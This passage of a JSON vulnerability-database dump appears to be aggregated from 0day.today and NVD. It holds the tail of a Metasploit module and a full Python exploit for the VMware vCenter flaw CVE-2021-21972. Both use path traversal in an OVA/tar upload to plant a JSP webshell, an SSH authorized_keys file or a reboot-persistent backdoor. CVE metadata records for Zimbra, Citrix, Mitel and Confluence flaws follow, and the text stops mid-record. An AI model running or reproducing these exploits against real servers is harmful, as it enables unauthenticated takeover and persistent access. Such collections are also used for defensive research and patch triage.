end\n\n case res.code\n when 200\n # {\"States\":\"[]\",\"Install Progress\":\"UNKNOWN\",\"Config Progress\":\"UNKNOWN\",\"Config Final Progress\":\"UNKNOWN\",\"Install Final Progress\":\"UNKNOWN\"}\n expected_keys = [\n 'States',\n 'Install Progress',\n 'Install Final Progress',\n 'Config Progress',\n 'Config Final Progress'\n ]\n\n if (expected_keys & res.get_json_document.keys) == expected_keys\n return CheckCode::Vulnerable('Unauthenticated endpoint access granted.')\n end\n\n CheckCode::Detected('Target did not respond with expected keys.')\n when 401\n CheckCode::Safe('Unauthenticated endpoint access denied.')\n else\n CheckCode::Detected(\"Target responded with code #{res.code}.\")\n end\n end\n\n def exploit\n upload_ova\n pop_thy_shell # ;)\n end\n\n def upload_ova\n print_status(\"Uploading OVA file: #{ova_filename}\")\n\n multipart_form = Rex::MIME::Message.new\n multipart_form.add_part(\n generate_ova,\n 'application/x-tar', # OVA is tar\n 'binary',\n %(form-data; name=\"uploadFile\"; filename=\"#{ova_filename}\")\n )\n\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/ui/vropspluginui/rest/services/uploadova'),\n 'ctype' => \"multipart/form-data; boundary=#{multipart_form.bound}\",\n 'data' => multipart_form.to_s\n )\n\n unless res && res.code == 200 && res.body == 'SUCCESS'\n fail_with(Failure::NotVulnerable, 'Failed to upload OVA file')\n end\n\n register_files_for_cleanup(*jsp_paths)\n\n print_good('Successfully uploaded OVA file')\n end\n\n def pop_thy_shell\n jsp_uri =\n case target['Platform']\n when 'linux'\n normalize_uri(target_uri.path, \"/ui/resources/#{jsp_filename}\")\n when 'win'\n normalize_uri(target_uri.path, \"/statsreport/#{jsp_filename}\")\n end\n\n print_status(\"Requesting JSP payload: #{full_uri(jsp_uri)}\")\n\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => jsp_uri\n )\n\n unless res && res.code == 200\n fail_with(Failure::PayloadFailed, 'Failed to request JSP payload')\n end\n\n print_good('Successfully requested JSP payload')\n end\n\n def generate_ova\n ova_file = StringIO.new\n\n # HACK: Spray JSP in the OVA and pray we get a shell...\n Rex::Tar::Writer.new(ova_file) do |tar|\n jsp_paths.each do |path|\n # /tmp/unicorn_ova_dir/../../<path>\n tar.add_file(\"../..#{path}\", 0o644) { |jsp| jsp.write(payload.encoded) }\n end\n end\n\n ova_file.string\n end\n\n def jsp_paths\n case target['Platform']\n when 'linux'\n @jsp_paths ||= spray_and_pray_range.shuffle.map do |idx|\n \"/usr/lib/vmware-vsphere-ui/server/work/deployer/s/global/#{idx}/0/h5ngc.war/resources/#{jsp_filename}\"\n end\n when 'win'\n # Forward slashes work here\n [\"/ProgramData/VMware/vCenterServer/data/perfcharts/tc-instance/webapps/statsreport/#{jsp_filename}\"]\n end\n end\n\n def ova_filename\n @ova_filename ||= \"#{rand_text_alphanumeric(8..42)}.ova\"\n end\n\n def jsp_filename\n @jsp_filename ||= \"#{rand_text_alphanumeric(8..42)}.jsp\"\n end\n\nend\n", "sourceHref": "https://0day.today/exploit/35912", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-09-09T22:25:43", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-01T00:00:00", "type": "zdt", "title": "VMware vCenter Server 7.0 - Unauthenticated File Upload Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972"], "modified": "2021-03-01T00:00:00", "id": "1337DAY-ID-35879", "href": "https://0day.today/exploit/description/35879", "sourceData": "# Exploit Title: VMware vCenter Server 7.0 - Unauthenticated File Upload\r\n# Exploit Author: Photubias\r\n# Vendor Advisory: [1] https://www.vmware.com/security/advisories/VMSA-2021-0002.html\r\n# Version: vCenter Server 6.5 (7515524<[vulnerable]<17590285), vCenter Server 6.7 (<17138064) and vCenter Server 7 (<17327517)\r\n# Tested on: vCenter Server Appliance 6.5, 6.7 & 7.0, multiple builds\r\n# CVE: CVE-2021-21972\r\n\r\n#!/usr/bin/env python3\r\n'''\r\n Copyright 2021 Photubias(c) \r\n This program is free software: you can redistribute it and/or modify\r\n it under the terms of the GNU General Public License as published by\r\n the Free Software Foundation, either version 3 of the License, or\r\n (at your option) any later version.\r\n \r\n This program is distributed in the hope that it will be useful,\r\n but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\r\n GNU General Public License for more details.\r\n \r\n You should have received a copy of the GNU General Public License\r\n along with this program. If not, see <http://www.gnu.org/licenses/>.\r\n \r\n File name CVE-2021-21972.py\r\n written by tijl[dot]deneut[at]howest[dot]be for www.ic4.be\r\n\r\n CVE-2021-21972 is an unauthenticated file upload and overwrite,\r\n exploitation can be done via SSH public key upload or a webshell\r\n The webshell must be of type JSP, and its success depends heavily on the specific vCenter version\r\n \r\n # Manual verification: https://<ip>/ui/vropspluginui/rest/services/checkmobregister\r\n # A white page means vulnerable\r\n # A 401 Unauthorized message means patched or workaround implemented (or the system is not completely booted yet)\r\n # Notes:\r\n # * On Linux SSH key upload is always best, when SSH access is possible & enabled\r\n # * On Linux the upload is done as user vsphere-ui:users\r\n # * On Windows the upload is done as system user\r\n # * vCenter 6.5 <=7515524 does not contain the vulnerable component \"vropspluginui\"\r\n # * vCenter 6.7U2 and up are running the Webserver in memory, so backdoor the system (active after reboot) or use SSH payload\r\n \r\n This is a native implementation without requirements, written in Python 3.\r\n Works equally well on Windows as Linux (as MacOS, probably ;-)\r\n \r\n Features: vulnerability checker + exploit\r\n'''\r\n\r\nimport os, tarfile, sys, optparse, requests\r\nrequests.packages.urllib3.disable_warnings()\r\n\r\nlProxy = {}\r\nSM_TEMPLATE = b'''<env:Envelope xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:env=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\">\r\n <env:Body>\r\n <RetrieveServiceContent xmlns=\"urn:vim25\">\r\n <_this type=\"ServiceInstance\">ServiceInstance</_this>\r\n </RetrieveServiceContent>\r\n </env:Body>\r\n </env:Envelope>'''\r\nsURL = sFile = sRpath = sType = None\r\n\r\ndef parseArguments(options):\r\n global sURL, sFile, sType, sRpath, lProxy\r\n if not options.url or not options.file: exit('[-] Error: please provide at least an URL and a FILE to upload.')\r\n sURL = options.url\r\n if sURL[-1:] == '/': sURL = sURL[:-1]\r\n if not sURL[:4].lower() == 'http': sURL = 'https://' + sURL\r\n sFile = options.file\r\n if not os.path.exists(sFile): exit('[-] File not found: ' + sFile)\r\n sType = 'ssh'\r\n if options.type: sType = options.type\r\n if options.rpath: sRpath = options.rpath\r\n else: sRpath = None\r\n if options.proxy: lProxy = {'https': options.proxy}\r\n\r\ndef getVersion(sURL):\r\n def getValue(sResponse, sTag = 'vendor'):\r\n try: return sResponse.split('<' + sTag + '>')[1].split('</' + sTag + '>')[0]\r\n except: pass\r\n return ''\r\n oResponse = requests.post(sURL + '/sdk', verify = False, proxies = lProxy, timeout = 5, data = SM_TEMPLATE)\r\n #print(oResponse.text)\r\n if oResponse.status_code == 200:\r\n sResult = oResponse.text\r\n if not 'VMware' in getValue(sResult, 'vendor'):\r\n exit('[-] Not a VMware system: ' + sURL)\r\n else:\r\n sName = getValue(sResult, 'name')\r\n sVersion = getValue(sResult, 'version') # e.g. 7.0.0\r\n sBuild = getValue(sResult, 'build') # e.g. 15934073\r\n sFull = getValue(sResult, 'fullName')\r\n print('[+] Identified: ' + sFull)\r\n return sVersion, sBuild\r\n exit('[-] Not a VMware system: ' + sURL)\r\n\r\ndef verify(sURL):\r\n #return True\r\n sURL += '/ui/vropspluginui/rest/services/uploadova'\r\n try:\r\n oResponse = requests.get(sURL, verify=False, proxies = lProxy, timeout = 5)\r\n except:\r\n exit('[-] System not available: ' + sURL)\r\n if oResponse.status_code == 405: return True ## A patched system returns 401, but also if it is not booted completely\r\n else: return False\r\n\r\ndef createTarLin(sFile, sType, sVersion, sBuild, sRpath = None):\r\n def getResourcePath():\r\n oResponse = requests.get(sURL + '/ui', verify = False, proxies = lProxy, timeout = 5)\r\n return oResponse.text.split('static/')[1].split('/')[0]\r\n oTar = tarfile.open('payloadLin.tar','w')\r\n if sRpath: ## version & build not important\r\n if sRpath[0] == '/': sRpath = sRpath[1:]\r\n sPayloadPath = '../../' + sRpath\r\n oTar.add(sFile, arcname=sPayloadPath)\r\n oTar.close()\r\n return 'absolute'\r\n elif sType.lower() == 'ssh': ## version & build not important\r\n sPayloadPath = '../../home/vsphere-ui/.ssh/authorized_keys'\r\n oTar.add(sFile, arcname=sPayloadPath)\r\n oTar.close()\r\n return 'ssh'\r\n elif (int(sVersion.split('.')[0]) == 6 and int(sVersion.split('.')[1]) == 5) or (int(sVersion.split('.')[0]) == 6 and int(sVersion.split('.')[1]) == 7 and int(sBuild) < 13010631):\r\n ## vCenter 6.5/6.7 < 13010631, just this location with a subnumber\r\n sPayloadPath = '../../usr/lib/vmware-vsphere-ui/server/work/deployer/s/global/%d/0/h5ngc.war/resources/' + os.path.basename(sFile)\r\n print('[!] Selected uploadpath: ' + sPayloadPath[5:])\r\n for i in range(112): oTar.add(sFile, arcname=sPayloadPath % i)\r\n oTar.close()\r\n return 'webshell'\r\n elif (int(sVersion.split('.')[0]) == 6 and int(sVersion.split('.')[1]) == 7 and int(sBuild) >= 13010631):\r\n ## vCenter 6.7 >= 13010631, webshell not an option, but backdoor works when put at /usr/lib/vmware-vsphere-ui/server/static/resources/libs/<thefile>\r\n sPayloadPath = '../../usr/lib/vmware-vsphere-ui/server/static/resources/libs/' + os.path.basename(sFile)\r\n print('[!] Selected uploadpath: ' + sPayloadPath[5:])\r\n oTar.add(sFile, arcname=sPayloadPath)\r\n oTar.close()\r\n return 'backdoor'\r\n else: #(int(sVersion.split('.')[0]) == 7 and int(sVersion.split('.')[1]) == 0):\r\n ## vCenter 7.0, backdoor webshell, but dynamic location (/usr/lib/vmware-vsphere-ui/server/static/resources15863815/libs/<thefile>)\r\n sPayloadPath = '../../usr/lib/vmware-vsphere-ui/server/static/' + getResourcePath() + '/libs/' + os.path.basename(sFile)\r\n print('[!] Selected uploadpath: ' + sPayloadPath[5:])\r\n oTar.add(sFile, arcname=sPayloadPath)\r\n oTar.close()\r\n return 'backdoor'\r\n \r\n\r\ndef createTarWin(sFile, sRpath = None):\r\n ## vCenter only (uploaded as administrator), vCenter 7+ did not exist for Windows\r\n if sRpath:\r\n if sRpath[0] == '/': sRpath = sRpath[:1]\r\n sPayloadPath = '../../' + sRpath\r\n else:\r\n sPayloadPath = '../../ProgramData/VMware/vCenterServer/data/perfcharts/tc-instance/webapps/statsreport/' + os.path.basename(sFile)\r\n oTar = tarfile.open('payloadWin.tar','w')\r\n oTar.add(sFile, arcname=sPayloadPath)\r\n oTar.close()\r\n\r\ndef uploadFile(sURL, sUploadType, sFile):\r\n #print('[!] Uploading ' + sFile)\r\n sFile = os.path.basename(sFile)\r\n sUploadURL = sURL + '/ui/vropspluginui/rest/services/uploadova'\r\n arrLinFiles = {'uploadFile': ('1.tar', open('payloadLin.tar', 'rb'), 'application/octet-stream')}\r\n ## Linux\r\n oResponse = requests.post(sUploadURL, files = arrLinFiles, verify = False, proxies = lProxy)\r\n if oResponse.status_code == 200:\r\n if oResponse.text == 'SUCCESS':\r\n print('[+] Linux payload uploaded succesfully.')\r\n if sUploadType == 'ssh':\r\n print('[+] SSH key installed for user \\'vsphere-ui\\'.')\r\n print(' Please run \\'ssh [email\u00a0protected]' + sURL.replace('https://','') + '\\'')\r\n return True\r\n elif sUploadType == 'webshell':\r\n sWebshell = sURL + '/ui/resources/' + sFile\r\n #print('testing ' + sWebshell)\r\n oResponse = requests.get(sWebshell, verify=False, proxies = lProxy)\r\n if oResponse.status_code != 404:\r\n print('[+] Webshell verified, please visit: ' + sWebshell)\r\n return True\r\n elif sUploadType == 'backdoor':\r\n sWebshell = sURL + '/ui/resources/' + sFile\r\n print('[+] Backdoor ready, please reboot or wait for a reboot')\r\n print(' then open: ' + sWebshell)\r\n else: ## absolute\r\n pass\r\n ## Windows\r\n arrWinFiles = {'uploadFile': ('1.tar', open('payloadWin.tar', 'rb'), 'application/octet-stream')}\r\n oResponse = requests.post(sUploadURL, files=arrWinFiles, verify = False, proxies = lProxy)\r\n if oResponse.status_code == 200:\r\n if oResponse.text == 'SUCCESS':\r\n print('[+] Windows payload uploaded succesfully.')\r\n if sUploadType == 'backdoor':\r\n print('[+] Absolute upload looks OK')\r\n return True\r\n else:\r\n sWebshell = sURL + '/statsreport/' + sFile\r\n oResponse = requests.get(sWebshell, verify=False, proxies = lProxy)\r\n if oResponse.status_code != 404:\r\n print('[+] Webshell verified, please visit: ' + sWebshell)\r\n return True\r\n return False\r\n\r\nif __name__ == \"__main__\":\r\n usage = (\r\n 'Usage: %prog [option]\\n'\r\n 'Exploiting Windows & Linux vCenter Server\\n'\r\n 'Create SSH keys: ssh-keygen -t rsa -f id_rsa -q -N \\'\\'\\n'\r\n 'Note1: Since the 6.7U2+ (b13010631) Linux appliance, the webserver is in memory. Webshells only work after reboot\\n'\r\n 'Note2: Windows is the most vulnerable, but less mostly deprecated anyway')\r\n\r\n parser = optparse.OptionParser(usage=usage)\r\n parser.add_option('--url', '-u', dest='url', help='Required; example https://192.168.0.1')\r\n parser.add_option('--file', '-f', dest='file', help='Required; file to upload: e.g. id_rsa.pub in case of ssh or webshell.jsp in case of webshell')\r\n parser.add_option('--type', '-t', dest='type', help='Optional; ssh/webshell, default: ssh')\r\n parser.add_option('--rpath', '-r', dest='rpath', help='Optional; specify absolute remote path, e.g. /tmp/testfile or /Windows/testfile')\r\n parser.add_option('--proxy', '-p', dest='proxy', help='Optional; configure a HTTPS proxy, e.g. http://127.0.0.1:8080')\r\n \r\n (options, args) = parser.parse_args()\r\n \r\n parseArguments(options)\r\n \r\n ## Verify\r\n if verify(sURL): print('[+] Target vulnerable: ' + sURL)\r\n else: exit('[-] Target not vulnerable: ' + sURL)\r\n \r\n ## Read out the version\r\n sVersion, sBuild = getVersion(sURL)\r\n if sRpath: print('[!] Ready to upload your file to ' + sRpath)\r\n elif sType.lower() == 'ssh': print('[!] Ready to upload your SSH keyfile \\'' + sFile + '\\'')\r\n else: print('[!] Ready to upload webshell \\'' + sFile + '\\'')\r\n sAns = input('[?] Want to exploit? [y/N]: ')\r\n if not sAns or not sAns[0].lower() == 'y': exit()\r\n \r\n ## Create TAR file\r\n sUploadType = createTarLin(sFile, sType, sVersion, sBuild, sRpath)\r\n if not sUploadType == 'ssh': createTarWin(sFile, sRpath)\r\n\r\n ## Upload and verify\r\n uploadFile(sURL, sUploadType, sFile)\r\n \r\n ## Cleanup\r\n os.remove('payloadLin.tar')\r\n os.remove('payloadWin.tar')\n\n# 0day.today [2021-09-10] #", "sourceHref": "https://0day.today/exploit/35879", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2023-06-03T14:53:53", "description": "Zimbra Collaboration Suite (ZCS) 8.8.15 and 9.0 has mboximport functionality that receives a ZIP archive and extracts files from it. By bypassing authentication (i.e., not having an authtoken), an attacker can upload arbitrary files to the system, leading to directory traversal and remote code execution. NOTE: this issue exists because of an incomplete fix for CVE-2022-27925.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-12T15:15:00", "type": "cve", "title": "CVE-2022-37042", "cwe": ["CWE-287"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-27925", "CVE-2022-37042"], "modified": "2022-10-28T13:38:00", "cpe": ["cpe:/a:zimbra:collaboration:8.8.15", "cpe:/a:zimbra:collaboration:9.0.0"], "id": "CVE-2022-37042", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-37042", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:zimbra:collaboration:9.0.0:-:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.15:-:*:*:*:*:*:*"]}, {"lastseen": "2023-06-03T14:31:02", "description": "Corruption of the system by a remote, unauthenticated user. The impact of this can include the reset of the administrator password at the next device reboot, allowing an attacker with ssh access to connect with the default administrator credentials after the device has rebooted.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-16T19:15:00", "type": "cve", "title": "CVE-2022-27511", "cwe": ["CWE-863"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "COMPLETE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:C/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-27511"], "modified": "2022-06-16T21:57:00", "cpe": [], "id": "CVE-2022-27511", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-27511", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:C/A:N"}, "cpe23": []}, {"lastseen": "2023-06-03T14:54:31", "description": "Zimbra's sudo configuration permits the zimbra user to execute the zmslapd binary as root with arbitrary parameters. As part of its intended functionality, zmslapd can load a user-defined configuration file, which includes plugins in the form of .so files, which also execute as root.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-16T20:15:00", "type": "cve", "title": "CVE-2022-37393", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.1, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:L/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-37393"], "modified": "2022-08-18T17:12:00", "cpe": ["cpe:/a:zimbra:collaboration:8.8.7", "cpe:/a:zimbra:collaboration:8.7.7", "cpe:/a:zimbra:collaboration:8.8.15", "cpe:/a:zimbra:collaboration:8.8.11", "cpe:/a:zimbra:collaboration:8.7.11", "cpe:/a:zimbra:collaboration:8.7.10", "cpe:/a:zimbra:collaboration:8.8.4", "cpe:/a:zimbra:collaboration:8.8.3", "cpe:/a:zimbra:collaboration:8.8.8", "cpe:/a:zimbra:collaboration:9.0.0", "cpe:/a:zimbra:collaboration:8.8.9", "cpe:/a:zimbra:collaboration:8.8.2", "cpe:/a:zimbra:collaboration:8.8.12", "cpe:/a:zimbra:collaboration:8.7.9", "cpe:/a:zimbra:collaboration:8.8.0", "cpe:/a:zimbra:collaboration:8.7.6", "cpe:/a:zimbra:collaboration:8.8.6", "cpe:/a:zimbra:collaboration:8.8.10"], "id": "CVE-2022-37393", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-37393", "cvss": {"score": 4.3, "vector": "AV:L/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:zimbra:collaboration:8.7.11:p13:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.9:-:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.7.6:*:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.15:p11:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.8:p1:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.7.11:p4:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.11:p5:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.15:p26:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.7.11:p5:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.9:p10:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.2:*:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:9.0.0:p7:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.15:p3:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.9:p1:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.7.11:p10:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.6:*:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.8:-:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:9.0.0:p26:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.7.11:p12:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.15:p31:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.15:p30:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:9.0.0:p19:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.7.11:p7:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.11:-:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.3:*:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.7:*:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.7.11:p2:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.9:p3:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.15:p33:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.7.11:p14:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.8:p3:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.7.7:*:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.8:p7:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.10:-:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:9.0.0:p27:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.7.11:p6:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:9.0.0:p4:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.7.11:p9:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:9.0.0:p25:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.12:p4:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.7.9:*:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.15:p5:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.4:*:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.12:-:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.12:p3:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.7.11:p15:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.7.11:-:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.10:p8:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.11:p4:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:9.0.0:p23:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.7.10:*:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.7.11:p3:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.7.11:p1:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.8:p4:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.11:p3:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.15:p34:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.7.11:p8:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.15:p32:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.8.15:-:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:9.0.0:p0:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:9.0.0:p7.1:*:*:*:*:*:*", "cpe:2.3:a:zimbra:collaboration:8.7.11:p11:*:*:*:*:*:*"]}, {"lastseen": "2023-06-03T14:35:19", "description": "The Service Appliance component in Mitel MiVoice Connect through 19.2 SP3 allows remote code execution because of incorrect data validation. The Service Appliances are SA 100, SA 400, and Virtual SA.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-26T02:15:00", "type": "cve", "title": "CVE-2022-29499", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-29499"], "modified": "2022-05-05T18:25:00", "cpe": ["cpe:/a:mitel:mivoice_connect:22.20.2300.0"], "id": "CVE-2022-29499", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-29499", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:mitel:mivoice_connect:22.20.2300.0:*:*:*:*:*:*:*"]}, {"lastseen": "2023-06-06T14:30:52", "description": "The Atlassian Questions For Confluence app for Confluence Server and Data Center creates a Confluence user account in the confluence-users group with the username disabledsystemuser and a hardcoded password. A remote, unauthenticated attacker with knowledge of the hardcoded password could exploit this to log into Confluence and access all content accessible to users in the confluence-users group. This user account is created when installing versions 2.7.34, 2.7.35, and 3.0.2 of the app.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", 